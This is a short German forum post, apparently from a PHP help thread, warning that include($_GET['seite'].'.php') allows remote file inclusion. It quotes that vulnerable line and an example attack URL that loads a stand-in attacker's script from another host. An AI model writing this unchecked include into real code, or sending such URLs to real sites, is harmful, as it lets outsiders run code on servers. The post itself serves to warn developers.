Hallo Freunde des gehobenen Forumsgenusses,

Nimm doch einfach mal wie von Alexander gepostet das hier: include($_GET['seite'].'.php');

UNd jetzt kommt der böse Cracker und ruft deine Seite wie folgt auf: http://www.example.org/include_skript.php?seite=http://www.example.com/seite_des_hackers.php (natürlich URL-encoded) - und schon wird fremder Code auf deinem Server ausgeführt - nich gut!

Erster! ;-)

Und wenn du den zweiten Code nimmst, den ich gepostet habe, wird nur standard.php inkludiert.
Darauf muss man aber erstmal kommen, dass man solche Prüfungen machen muss.

Gruß
Alexander Brock